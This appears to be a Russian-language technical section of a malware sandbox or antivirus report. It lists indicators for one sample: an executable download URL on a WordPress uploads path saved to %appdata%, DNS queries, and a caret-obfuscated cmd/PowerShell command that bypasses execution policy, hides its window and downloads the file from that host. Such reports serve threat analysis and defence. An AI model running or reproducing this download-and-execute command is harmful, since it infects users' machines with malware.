Техническая информация
- http://lettersforplay.com/wp-content/uploads/velaeb7x/qobwt9b7.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OW^ErsHel^L.Ex^e -exE^cU^TiOnp^OliCy B^YpAS^s -^nOp^roF^i^L^E ^-w^INdO^WstylE^ hIDdEn (NE^W-^objeCt SyStem^.^net.wEbC^lI^e^Nt).dOwnL^oad^F^iLE('http://lettersforplay.com...
- 'le####sforplay.com':80
- http://le####sforplay.com/wp-content/uploads/velAeb7X/qoBWT9b7.exe
- http://le####sforplay.com/
- http://ww#.###tersforplay.com/
- DNS ASK le####sforplay.com
- DNS ASK ww#.###tersforplay.com
- '<SYSTEM32>\cmd.exe' /c "p^OW^ErsHel^L.Ex^e -exE^cU^TiOnp^OliCy B^YpAS^s -^nOp^roF^i^L^E ^-w^INdO^WstylE^ hIDdEn (NE^W-^objeCt SyStem^.^net.wEbC^lI^e^Nt).dOwnL^oad^F^iLE('http://lettersforplay.com...' (со скрытым окном)